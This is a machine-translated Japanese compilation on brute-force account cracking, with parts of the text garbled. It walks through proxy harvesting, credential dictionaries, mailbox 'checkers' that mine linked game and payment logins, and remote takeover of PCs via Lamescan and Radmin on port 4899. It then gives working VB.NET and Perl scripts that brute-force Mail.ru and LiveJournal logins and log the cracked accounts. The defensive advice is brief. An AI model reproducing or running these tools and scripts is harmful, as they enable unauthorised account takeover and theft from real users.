ブルート フォース (英語の表現: brute Force に由来) は、タイプの 1 つです。 ハッカー攻撃- アカウントをハッキングする方法 コンピュータシステム、支払い/銀行サービス、およびパスワードとログインの組み合わせの自動選択による Web サイト上で。

ブルート フォースは、同じ名前の数学的手法 (ブルート フォース) に基づいています。 正しい決断— 最終的な数値または記号の組み合わせは、さまざまなオプションを検索することによって見つかります。 実際、潜在的な答え (ソリューション) の特定のセットの各値が正しいかどうかがチェックされます。

ブルートフォースの仕組み

ハッカーは、パスワードを推測するための特別なプログラムを作成するか、同僚が提供する既製のソリューションを使用します。 特定の電子メール サービス、Web サイト、ソーシャル ネットワークをターゲットにすることができます (つまり、特定のリソースのハッキングを目的としています)。 次に、ハッキングの準備を行います。 これは次の段階で構成されます。

1. 代理人リストの作成

攻撃が実行されるコンピュータの実際の IP アドレスを隠し、アカウントがハッキングされる必要があるサイトからのブロックを防ぐために、プロキシ サーバーを介してインターネット接続が構成されます。

プロキシ アドレス/ポートの検索は、プロキシ グラバーで実行されます。 このユーティリティは、プロキシを提供するサイト (リストで指定されている) から中間サーバーに接続するためのすべてのデータを独立して取得します。 つまり、プロキシが収集されます。

作成されたデータベースは別のテキスト ファイルに保存されます。 そして、それに含まれるすべてのサーバー アドレスがプロキシ チェッカーで機能するかどうかチェックされます。 多くの場合、自動プロキシ マイニング用に設計されたプログラムは、グラバーとチェッカーの両方の機能を組み合わせています。

その結果、IP/ポートのリストの形式で既製のプロキシ リストが取得され、次の場所に保存されます。 txtファイル。 (総当たりプログラムをセットアップするときに必要になります)。

1. ブルートの拠点を検索

辞書をブルート フォース (パスワードとログインの特定の組み合わせ) に接続し、ログイン フォームで置き換える必要があります。 プロキシ リストと同様に、通常のリストの形式をとります。 テキストファイル（。TXT）。 データベースとも呼ばれる辞書は、ハッカー フォーラム、Web サイト、ファイル ホスティング サービスを通じて配布されます。 経験豊富な「職人」が自ら作成し、有償で皆様にご提供しております。 ベース (組み合わせ、ログイン、アカウントの数) が大きければ大きいほど (ハッカーにとって)、ハッキングが成功する可能性が高くなります。

1. ブルートフォースの設定

プロキシ リストがロードされます。 選択プログラムは、Web サーバーが攻撃を検出しないようにプロキシを自動的に変更し、それに応じて攻撃のソース (ホスト) を変更します。

パスワードとログインの組み合わせの辞書が接続されています。 スレッドの数が設定されます。ブルート フォースが同時にチェックする組み合わせの数です。 強力なコンピュータと 高速インターネット接続は 120 ～ 200 のストリームに確実に対応します (これが最適な値です)。 ブルートの速度はこの設定に直接依存します。 たとえば、スレッドを 10 個だけ設定した場合、選択は非常に遅くなります。

1. 総当たりの実行

このプログラムは成功したハッキン​​グの試みを記録し、リンクされたアカウント (パスワード/ログイン) をファイルに保存します。 選択手順の期間は、数時間から数日間の範囲です。 ただし、ログインデータの暗号強度が高かったり、攻撃者によるその他の保護手段が講じられていたりするため、必ずしも効果があるとは限りません。

ブルートフォースの種類

個人的なハッキング

特定のアカウントを探す - ソーシャル ネットワーク、電子メール サービスなどで。 途中で、またはその過程で バーチャルコミュニケーション攻撃者は被害者に Web サイトにアクセスするためのログインを要求します。 次に、ブルート フォース手法を使用してパスワードを解読します。ブルート フォース手法を使用して、Web リソースのアドレスと取得したログイン情報を示し、辞書に接続します。

たとえば、同じ XSS 攻撃と比較すると、このようなハッキングの可能性は小さいです。 アカウント所有者が単純な記号の組み合わせを含む 6 ～ 7 文字のパスワードを使用した場合、成功する可能性があります。 そうしないと、12、15、20 文字、数字、特殊文字のより安定した選択肢を「解く」には、計算に基づいて何年も、何十年、何百年もかかります。 数式検索。

ブリュット/チェック

1 つのメールボックスからのログイン/パスワードを含むデータベース 郵便サービス(たとえば、mail.ru) またはそれとは異なります。 そして、プロキシ リスト - ノードをマスクするため (1 つの IP アドレスからの複数のリクエストに対して Web サービスが使用されるため) 電子メール攻撃は非常に早く検出されます)。

野蛮人のオプションは、キーワード (通常はサイト名) のリストを示します。これは、ハッキングされたメールボックスのログイン情報を検索するためのランドマークです (例: steampowered、worldoftanks、4game、VK)。 または特定のインターネット リソース。

オンライン ゲーム、ソーシャル ネットワーク、またはフォーラムに登録するとき、ユーザーは予想通り、自分の電子メール ( メールボックス）。 Web サービスは、ログイン情報と登録を確認するためのリンクを含むメッセージを指定されたアドレスに送信します。 ブルートフォースがログイン情報とパスワードを抽出するために探すのは、これらの文字です。

「開始」をクリックすると、クラッキングプログラムがブルートフォースを開始します。 次のアルゴリズムに従って動作します。

1. 電子メールのログイン/パスワードをデータベースからロードします。
2. アクセスをチェックする、または「チェック」（自動的にログイン）: アカウントにログインできる場合は、良好な列にアカウントを追加し（これは、別の仕事用電子メールが見つかったことを意味します）、その閲覧を開始します（次の点を参照） ); アクセスがない場合は、不良としてリストされます。
3. すべての「ビープ音」（電子メールを開く）では、ハッカーが指定したリクエストに従って総当たり攻撃が文字をスキャンします。つまり、指定されたサイトと支払いシステムのログイン/パスワードが検索されます。
4. 必要なデータが見つかると、それをコピーして別のファイルに書き込みます。

したがって、数十から数百に及ぶ大規模なアカウントの「ハイジャック」が発生します。 攻撃者は、取得した「トロフィー」を販売、交換、データ収集、金銭の盗難など、独自の裁量で処分します。

リモートコンピュータのハッキング

ブルートフォースと他のハッキングツールを組み合わせて使用​​され、 リモートアクセスインターネット チャネル経由で、パスワードで保護された被害者の PC に送信します。

このタイプの攻撃は次の段階で構成されます。

1. ユーザーのコンピュータへの攻撃が行われるIPネットワークの検索が実行されます。 アドレス範囲は特別なデータベースから取得されるか、 特別番組、IP ジオなど。 ここでは、特定の地区、地域、さらには都市の IP ネットワークを選択できます。
2. 選択された IP 範囲と選択辞書は、リモートのブルート フォース ログイン/パスワードを目的とした Lamescan ブルート フォース (またはその類似物) の設定で設定されます。 起動すると、Lamescan は次のことを行います。

• 指定された範囲から各 IP に接続します。
• 接続を確立した後、ポート 4899 経由でホスト (PC) への接続を試行します (ただし、他のオプションがある場合もあります)。
• ポートが開いている場合: システムへのアクセスを試み、パスワードの入力を求められたら、推測を実行します。 成功すると、ホスト (コンピュータ) の IP アドレスとログイン情報がデータベースに保存されます。

1. ハッカーは、リモート PC を管理するために設計された Radmin ユーティリティを起動します。 被害者のネットワーク座標 (IP、ログイン、パスワード) を設定し、受信します。 フルコントロールシステムの上 - デスクトップ (攻撃者のコンピュータのディスプレイに視覚的に表示される)、ファイル ディレクトリ、設定。

ブルータス向けプログラム

古典的なブルート フォース、まさに最初の 1 つ。 ただし、関連性が失われることはなく、新しいソリューションと競合します。 高速総当りアルゴリズムを備えており、TCP/IP、POP3、HTTP などの主要なインターネット プロトコルをすべてサポートしています。Cookie を偽造できます。 辞書をブルートし、独自にパスワードを生成します。

強力なブルートチェッカー。 データベースを操作するための拡張機能（チェック、ドメインによるソート）を装備しています。 サポート さまざまな種類プロキシの機能をチェックします。 日付などの設定に基づいてメールボックス内の手紙をスキャンします。 キーワード、 住所、 未読メッセージ。 Mail.ru と Yandex から手紙をダウンロードできます。

Appnimiパスワードロック解除ツール

ファイルのパスワードを総当たり攻撃するプログラム ローカルコンピュータ。 一種の主力製品。 プログラムの無料版では、5 文字以内のパスワードを選択できます。 Appnimi Password Unlockerのインストール方法と使用方法について読むことができます。

違法に入手された、つまりハッキングまたは盗まれたゲームやソーシャル ネットワークなど。 もちろん、ブルートとは何か、そしてそれがどのように機能するかを理解するのは非常に困難ですが、私たちはそれを理解しようとします。 まずは、攻撃者の次の犠牲者にならないようにする方法を考えてみましょう。

ブルートフォースとは何か、そしてそれから身を守る方法

したがって、数字と文字の組み合わせを選択することで、既存のログイン、電子メールなどの正しいパスワードを見つけることができる特別なソフトウェアがあります。 もちろん、そのようなプログラムの操作には多くの機能があります。 たとえば、パスワードが長く複雑であればあるほど、解読に時間がかかり、総当たり攻撃が失敗する状況に陥る可能性があります。 時間に関しては、機器の計算能力とインターネット接続に大きく依存します。 そのため、このプロセスは数分から続く場合もあれば、1 日以上かかる場合もあります。

おそらく、アカウントブルートフォースが何であるかをすでに理解しているでしょう。 セキュリティに関しては、上でも述べたように、自分では覚えにくいパスワードを設定することをお勧めします。 たとえば、RKGJH4hKn2。 これをハッキングするとかなり問題になると言っても過言ではありません。 さらに、たとえば、数字と同様に、同じ文字が多数存在しても何の効果もないことを覚えておく必要があります。 すべてを混乱させて混合する必要があり、大文字と大文字を交互に使用することをお勧めします。

ブルートベースとは何ですか？

もちろん、データがなければプログラムは動作しません。 したがって、パスワードを推測するものが何もない場合、彼女はこれを実行しません。 データベースは、パスワードとログインのセットです。 このリストが広範囲に及ぶほど、アカウントがハッキングされる可能性が高くなります。 多くは、その中にどのような組み合わせが存在するかに依存します。つまり、より有能に構成されているほど、より良いものになります。 英語で「総当たり」を意味するブルート フォースでは両方を同時に選択できるため、データベースにはパスワードだけでなくログイン情報も含まれることにも注目してください。

すべてのレコードが保存されているファイル自体が非常に大きいことに注意してください。 組み合わせの最小長は 3 文字と数字で、最大長はプログラムとそのバージョンに応じて 8 ～ 16 文字です。 選択範囲は文字「A」で始まり、英語またはロシア語のアルファベットの最後の文字で終わります。 基本的に、これはデータベース上の役に立つ可能性のあるすべての情報です。

誰がなぜこれを必要としているのでしょうか?

この質問に明確に答えるのは困難です。 人々はさまざまな理由でアカウントをハッキングしようとします。 それは単なる楽しみのため、他の人の手紙を読みたい、無効なメッセージを送信したいなどの理由で行われる可能性があります。問題は、これは違法であるということです。 さらに、それは本物の窃盗とみなされる可能性があり、それに答える必要があります。 特に時間の無駄になる場合があるため、そのようなことを行うことは強くお勧めできません。

アカウントがハッキングされた場合でも、迅速かつ簡単に復元できます。 これは、登録時に実際のデータを提供した場合に特に簡単に実行できます。 に作成されたアカウントに関しては、 簡単な修正、その後、それらを取り戻すのははるかに困難になります。 しかし、実践が示すように、そのようなアカウントはハッカーによって評価されません。 役に立たない人のアカウントやメールを奪っても意味がありませんし、それについて改めて話す必要もありません。

誰がブルートフォースを行うのでしょうか？

これはいわゆるハッカーによって行われていると言っても過言ではありません。 これは大規模なハッキングに当てはまります。 概して、そのような人々はこれで生計を立てており、それを非常に巧みに行っています。 そして、このスキームは次のように機能します。 総当たりでログイン情報とパスワード (特定の数) を選択し、すべてを顧客に卸売りします。 つまり、ハッカー自身は違法に入手したものを実際には使用せず、単に販売しているだけです。 しかし、買い手は誰ですか?

それは誰でも構いません。 ただ一つ言えるのは、彼らは買い物をしているということです 大量アカウント。 これらのアカウントは販売されます 一般ユーザー、その後、元の所有者に返されたことに驚かれます。 決済システム (Webmoney、Qiwi) の個人データにも同じことが当てはまります。 一定の資金を獲得できる可能性があるという事実に加えて、そのようなアカウントは販売される可能性があります。これは、所有者の能力を確認する高価な証明書がある場合に特に当てはまります。

ブルート フォース用のプロキシ サーバーについて少し説明します。

自尊心のあるハッカーは、まず自分自身を守る方法を考えます。 そして、彼の行為は完全に違法であるため、これには特別な注意を払う必要があります。 ブルート フォースが何であるかはすでに理解しました。次に、プロキシ サーバーがどのように機能するかを説明したいと思います。 これにより、アカウントのハッキング中に検出されないようにすることができます。 簡単な言葉で言うと, IPアドレスは不明のままです。 これは、他人のアカウントをハッキングする人に対する主な保護です。

しかし、それだけではありません。 アカウントがハッキングされた後は、ログインする必要があります。 ただし、ユーザー名とパスワードが正しい場合でも、これを行うのが簡単ではない場合があります。 たとえば、IP アドレスを変更するには、電子メールまたは電話にセキュリティ コードを送信する必要があります。このようなシステムは、Valve によって、特に Steam と呼ばれる製品を保護するためにうまく使用されています。 もちろん、ブルータスにとってはすでに明らかになっています。 したがって、どのアカウントにもログインでき、まったく疑いを抱かず、犯罪は完璧になります。

パスワードは長くて複雑である必要があることをもう一度繰り返す必要はありません。 また、混雑した場所や職場など、誰もがコンピューターやラップトップを使用できる場所でアカウントを使用することはお勧めできません。 まず、ご存知のとおり、どのキーが押されたかを記憶する特別なスパイ プログラムを使用できます。パスワードを理解するのは難しくありません。

しかし、知っておく必要があるのはそれだけではありません。 ブラウザ内のパスワードは傍受される可能性があるため、覚えないようにすることをお勧めします。 ログインするとすぐに確認コードが記載された SMS が届くアカウントがあります。 携帯電話。 したがって、それが到着しても、それと関係がない場合は、パスワードを変更し、できるだけ早く行動することをお勧めします。

ブルートとチェッカーの違いは何ですか?

それでは、これら 2 つの概念の違いを見てみましょう。 したがって、総当たりで辞書 (ベース) から検索するだけでログインとパスワードを選択できるようにすることがすでに決定されています。 電子メール サービスをハッキングする例を見てみましょう。 たとえば、アクセス権を獲得しましたが、次に何をすればよいでしょうか? 一般に、あなたはソーシャルネットワーク上のアカウントに関する情報に興味があります。 オンラインゲーム, 決済システムしたがって、チェッカーは、すでに持っている電子メールのパスワードが一致するかどうかをチェックします。

簡単に言えば、たとえば VKontakte にインストールされているものと一致する場合、すぐに認識されます。 これにより、不必要な頭痛の種がなくなると結論付けることができます。 その結果、プロセスはより自動化され、実質的に私たちの参加を必要としません。 これで、ブルートとチェッカーが何であるか、そしてこれらのプログラムがどのように機能するかがわかりました。

結論

上記に基づいて、特定の結論を引き出すことができます。 アカウントにのみ使用する必要があります パソコン権限のない者のアクセスを排除する場合。 への接続にも同じことが当てはまります 無料Wi-Fi、データストリームが傍受され、その後アカウントが盗まれる可能性があるためです。 ブルート、あなたはすでに知っているので、自分自身を守るのははるかに簡単になります。 よく言われるように、気づいている人は備えができています。 アカウントがどれだけ適切に保護されるかはあなた次第であることに注意してください。 すべてを正しく行った場合は、再度心配する必要はありません。また、アカウント ブルート フォースとは何か、プログラムがどのように動作するかの微妙な違いを知る必要もほとんどありません。

こんにちは、みんな！ ようやく長い記事を書く時間ができました。

その中で、BruteForce (口語的には「brut」) の書き方を紹介します。

1) ちょっとした歴史

年の初めに、私はインターネットで強引な書き込みに関する情報を探し始めました。

内容はほとんどなく、スペイン語から翻訳する必要さえありました =))。

しかし、私は諦めずに検索を続け、2 か月前にすべてを理解して、シンプルなシングルスレッドのブルートフォースを作成しました。 しかし、それは「Brutus AET2」のような「巨人」とは程遠いものでした。 私はマルチスレッドに関する情報を探し始めましたが、検索は見事に成功しました。 すべての情報が収集されたので、強引に書こうと決めた人がネットワークの片隅を這い回って情報を収集する必要がないように、この記事を書いています。

2) 理論

前回の話で、ブルートフォースという言葉を何度か触れました。 これは何ですか？

例を挙げて説明します。電子メールのパスワードを忘れたとします (ちなみに、これはよく起こります)。

秘密の質問または携帯電話を使用してパスワードを回復することはできますが、携帯電話をお持ちではなく、秘密の質問が「猫の右足には歯は何本ありますか?」と表示されている場合は、

それではどうすればいいでしょうか？ そうです、パスワードを推測してみてください。 でもどうやって？ 手動で?? もちろんそうではありません。ブルート フォースは、ユーザーに代わってブルート フォースを実行するために作成されました。

動作原理はシンプルです。メールアドレスを指定し、パスワードのリストを接続します。 「開始」をクリックして、業務を開始します。 いつ引き取られますか 正しいパスワード、総当たりで画面に表示されます。

すべて問題ないでしょうが、辞書に 100 万個のパスワードがある場合はどうなるでしょうか? Brutus はサーバーに 100 万件のリクエストを送信すると、サーバーは私たちが他の人のメールボックスをハッキングしようとしていると判断し、単純に私たちの IP アドレスをブロックします。 それではどうやって？

この目的のために、プロキシ サーバーが提供されます。 それが何であるかについては、かなり広範なトピックなので説明しません。 プロキシについて読むことができます。 一言で言えば、プロキシは IP を変更し、検索は続行されます。

理論の最後のポイントは検索モードです。

そのうち、シングルスレッドとマルチスレッドの 2 つだけがあります。

シングルスレッド モードでは、ブルート フォースが最初のパスワードを取得し、サーバーからの応答を待ちます。 応答を受信すると、次のパスワードがかかります。

マルチスレッド モードでは、ブルート フォースによって多数のスレッドが作成されます。 それらのそれぞれで、ブルート フォースが発生します。つまり、ブルート フォースは続行するためにサーバーからの応答を待つ必要がありません。 次のスレッドを作成するだけで、検索が続行されます。

例: torrent 経由で映画をダウンロードすることにしました。 torrent ファイルを見つけてダウンロードを開始しました。 ダウンロードの進行中に、たとえば、[連絡先] に移動して友人と連絡を取ったとします。 あるスレッドではブラウザが実行され、別のスレッドでは torrent が熱心に映画をダウンロードし、3 番目のスレッドではウイルス対策ソフトがシステムをスキャンしています。

わかりやすく説明できたと思います。

２）待ちに待った練習

単純なシングルスレッド ブルート フォースを作成している間 (脳に過負荷にならないように)、後半ではマルチスレッド ブルート フォースの作成と変更について説明します。

プロキシ + あなたのプロジェクトで使用できるコードの一部を提供します。

それで！ さあ行こう。

VB.NET を開いて通常のプロジェクトを作成し、次のようなものを作成します。

次に、サーバーを決定し、リクエストを「嗅ぎ分ける」必要があります。

例として Mail.ru を使用する方法を示します。

これを使用して、サーバー上で認証がどのように行われるかを確認します。

2) プログラムのスタンドアロン バージョンを起動します: 3

3) Mail.ru メールに移動してデータを入力します。ただし、まだログインしないでください。

4) HttpAnalyzer で、一時停止をクリックします。

「メール」「メール」に戻り、「ログイン」をクリックします。

さて、スニッファーの話に戻りましょう。 私たちは次のことを観察しています。

青で強調表示 POSTリクエスト認可スクリプトに。

どのようなデータが送信されるかを見てみましょう。

ログイン - ログイン

ドメイン - ドメイン

パスワード - パスワード

Saveauth - データを保存する必要がありますか (正確にはわかりません)

最後のパラメータについては何も言えませんが、必要ありません :n =)

リクエストを送信してみましょう。

すべてが正しく入力されていれば、メールが届きます。

そうでない場合は、ログイン エラー メッセージが表示されます。

これを行うには、「Cookie」タブに移動します。 私たちは右側に興味があります:

Mpop と t という 2 つの Cookie が作成されたことがわかります。

「Set - Cookie」 - サーバーに送信されるヘッダー フィールド。

6) 次に、左のデータを入力して結果を分析しましょう。

Cookie が作成されていないことがわかります。

素晴らしい！ これで、ブルート フォースを記述する方法がわかりました。

まず、辞書からパスワードを配置する配列を宣言しましょう。

新しい ArrayList としてのパブリック PassList

「...」ボタンのコード (3 つのドット):

Dim f As New OpenFileDialog「作成」 新しい対話ファイルを開く If f.ShowDialog = Windows.Forms.DialogResult.OK And f.FileName<>"" then " ユーザーがリストを選択した場合、PassList.AddRange(IO.File.ReadAllLines(f.FileName)) " すべてのパスワードを配列に読み取ります txtPassList.Text=f.FileName " ファイルへのパスを表示しますテキストボックスの終了条件

[検索開始] ボタンのコードは次のとおりです。

txtLogin.Textの場合<>"" then " ログインを入力した場合は、 Dim i As Integer = 0 " 検索するカウンターを宣言 For i = 0 To PassList.Count - 1 " パスワードがある間に検索 System.Threading.Thread.Sleep(1000) Dim Net としてリクエストします。 HttpWebRequest = Net.HttpWebRequest.Create("http://win.mail.ru/cgi-bin/auth?Login=" & txtLogin.Text & "&Domain=" & Split(txtLogin.Text, "@ ")(1 ) _ & "&Password=" & PassList(i)) " リクエストを作成します Dim Response As Net.HttpWebResponse "データ転送メソッド: Request.Method = "POST" "自動遷移を禁止します Request.AllowAutoRedirect = False " 送信リクエスト Response = Request.GetResponse "Cookie を確認する If Response.Headers("Set-Cookie").IndexOf("Mpop") = 0 then " Mpop Cookie がある場合、MsgBox("選択されたパスワード: " + PassList( i)) " 正しいパスワードを表示します。 Exit Sub " 検索を終了します End If Next End If

不明な点がある場合は、私に書いてください。 私の連絡先の詳細を以下に残しておきます。

次のようなパスワード辞書を作成します。

[正しいパスワードはこちらです]

234411dsdfd

赤いテキストをコピーしてパスワードに変更します。

すべてをプログラムに接続します。

クリックして検索を開始します。

「パスワードが選択されました」ウィンドウが表示されれば、すべてが機能しています。

P.S タイプミスをお詫びします。

P.P.S 何か不明な点がある場合は、書き込んでください。 いつも喜んでお手伝いさせていただきます！

コメント ()

クルハツカー

コードを教えます!!! いったいどんな人たちなのでしょうか？

ゼオン

何が目立つのでしょうか？

クルハツカー

ということで、VB.NETに移行しました。 くそー、誰もがハッキングのためにすべてを書いているので、それを書いただけなら、コードも強調表示しようとするでしょう。

次世代への大きなお願い: コードを選択しないでください。

アルチョム

うわー、メガパワーを吸いますね

ソースリンク

せめてソース載せてよ

ディクサルコリア

とても役に立つレッスン:) 私は成功しました ビジュアルベーシック 2008年、少し編集しましたが

誰もがその方法を知っています 最近になった
人気のあるリソースは、livejournal.com または単に LiveJournal です。
このシステムでアカウントを作成するのは決して簡単ではありません。
ただ。 キーの代金を支払うか、
LJist の友達に聞いてください。

有名なことわざがあります。
物乞いして自分を辱める方が良い<вырезано
検閲>そして黙っていてください:)。 したがって、今日私たちは、
ブルートフォースを書きますが、これは簡単です
アメリカ人のLiveJournalの手を壊すだろう
くだらない:)。 もちろん選択しなければなりません
その後いくつかのメッセージを送った被害者
登録して水中に消えた
先ほどライブジャーナルに投稿しました。 そのような
アカウントはたくさんありますが、それらは何もしなくても見つけることができます。
問題。

それでは、私たちのアイデアに戻りましょう。 まず私たちは
ログイン方法を知る必要がある
システム。 www.livejournal.com/login.bml にアクセスすると、次のことがわかります。
右上隅に小さなフォームがあります
ログイン いいえ、真ん中の大きなものについて判断しているわけではありません
画面。 HTMLコードを見た後、私は選択しました
小さい。 実際のところ、この形ではすべてが
完全なパラメーターとは対照的に、パラメーターは 2 つです。 私たちの
将来のブルートフォースは少なくとも送信する必要があります
高効率のためのデータ
この型に注目してみましょう。

フォームにはユーザーとパスワードの 2 つのパラメータがあります。 自分自身
スクリプトはオプションで取得できます
mode パラメータ。その値は「login」です。
どうやら、ユーザーとパスワードを渡すときに、システムは
認可を意味します。 せっかちに
リンク http://www.livejournal.com/login.bml?user=fuck&password=fucked をブラウザに入力します
（もちろん、名前はすべて変更しています）
陰謀:))、私は方向転換を受け取りました。
このシステムは POST メソッド専用に設計されています。
でも、私はしつこい性格なので、それでも抵抗できませんでした。
この保護:]。

次のステップは記憶を回復することでした
POSTメソッドの動作について。 彼にとって
以下の必須要件の移転が関連します
サーバーへのパラメータ:

役職
ホスト
コンテンツの長さ

実際には投稿です:)

リクエストを大まかに書き出したところ、
サーバーから次のメッセージを受け取りました。

POST /login.bml HTTP/1.1
ホスト: www.livejournal.com
コンテンツタイプ: application/x-www-form-urlencoded
コンテンツの長さ: 26

ユーザー=ファック&パスワード=ファック

奇妙なことに、それは機能しませんでした:)。 システム
間違ったパスワードに呪われました。 と思いました。
RefererとUserAgentにチェックがあるのですが、間違えてしまいました。
偽のパラメータを代入する場合
サーバーも「パスワードが正しくありません」という応答を返しました。 どうやって
パスワードの後に​​入れたら判明した
& 記号を使用して、行の長さを だけ長くします。
1 つ目は、サーバーがデータを正常に読み取った後、
ログイン済みが返されました。

本当は全部出したくなかったんだ。
長い HTML 行から 1 行を切り取る
ログインしました。 控えめなレクリエーションに限定したかったのですが、
1キロバイトのデータ:)。 それは可能でした
サーバーがヘッダー行に Cookie を入れたためです。
応答が成功した場合、これらの Cookie には次のものが含まれます。
ユーザー名と暗号化されたパスワード、
おおよそ次の形式になります。

セットクッキー: ljsession=ws:fuck:1:fDjwfWdsC; パス=/; HTTPのみ

ヘッダーに次のものが含まれているかどうかを確認することを妨げるものは何もありませんでした。
ユーザー名、存在する場合は停止
ブルート フォースを実行してログ アカウントに書き込みます。

理論的には、強引に書かれています。 左
この問題を実践してください。 私
Perl を知っているのでコーディングに Perl を使用しました
この言語はすでに 3 年目ですが、完璧に適合しています
私のアイデアのために。 私のネジを調べてみたら
ブルート フォース テンプレート、httpd アカウント用の MIME ブルート フォースを見つけました。
私はかつてこのサイトで説明しました:)。
少し変えて、本格的なものになりました
LiveJournal のブルートフォース。 唯一の欠点
シングルスレッドですが、これに関しては
あなたのようなクールなプログラマーなら、そんなことは起こらないと思う
大きな問題:)。 それはあなたに残ります
マルチスレッドを実装する、または
私のデモ版を使用してください;)。

したがって、実際のコードは次のようになります。

#!/usr/bin/perl
IO::ソケットを使用します。 ##ソケットの使用
$|++; ## インクリメント
バッファリングする
$server="www.livejournal.com"; ##設定しました
サーバ
$ポート="80"; ## そしてまた
ポート:)
$logfile="クラックされたログ"; ##ここ
ハッキングされたアカウントを書き込む
$words="bigdict.txt"; ## 私たちの
ガイドとなる大きな辞書
強引な
$user="ファック"; ## ユーザー、
私たちが壊すもの
$dir="/login.bml"; ## スクリプト、
ステータスを返す
open(file, "$words") または die print "$!\n";
@データ= ;
$total=@データ;
ファイルを閉じます。 ##開けましょう
辞書、すべての単語を配列に書き込みます
foreach $pass (@data) ( ##循環
すべての言葉
$i++;
chomp($pass);
$socket=IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port、
プロト => tcp)
または、「$server:$port に接続できません\n」と出力します。 ##
livejournal.com への接続を作成する
$socket->autoflush(1); ##
バッファリングを遮断しました (念のため...
デフォルトのため削減されています）
$post="ユーザー=$ユーザー&パスワード=$パス&"; ##
POSTリクエストの作成
$len=長さ($post);
$len+=1; ##長さを調べる
クエリ (フレーズ + \r\n)
print $socket "POST $dir HTTP/1.1\r\n";
print $socket "ホスト: www.livejournal.com\r\n";;
print $socket "Content-Type: application/x-www-form-urlencoded\r\n";
print $socket "接続: 閉じる\r\n";
print $socket "コンテンツの長さ: $len\r\n";
print $socket "\r\n$post\r\n";

## ソケットに送信する
長いヘッダー

$socket->recv($answer,1024); ## そして
読み取り戻り = 1 KB のデータ

if ($answer=~/\:$user\:/) (
open(logf, ">>$logfile") または die print "$!\n";
print logf "$user:$pass は OK!!!\n";
ログファイルを閉じます。
print "$user:$pass は OK!!!\n";
出口0; ## 含まれている場合
次のような行:user: - ログを書き込み、ブルート フォースを完了します。
} ## それ以外の場合は、確認してみましょう
次のパスワード
}

実際、それが総力のすべてです。 確認済み
私個人にとって、それは魅力的に機能します:)。 しかし、アカウント
あなたにチェックさせるつもりはありません - 私は貪欲なので ;)、testi
自分たちで。 ご覧のとおり、すべて簡単に実装できます。
したいだけなら。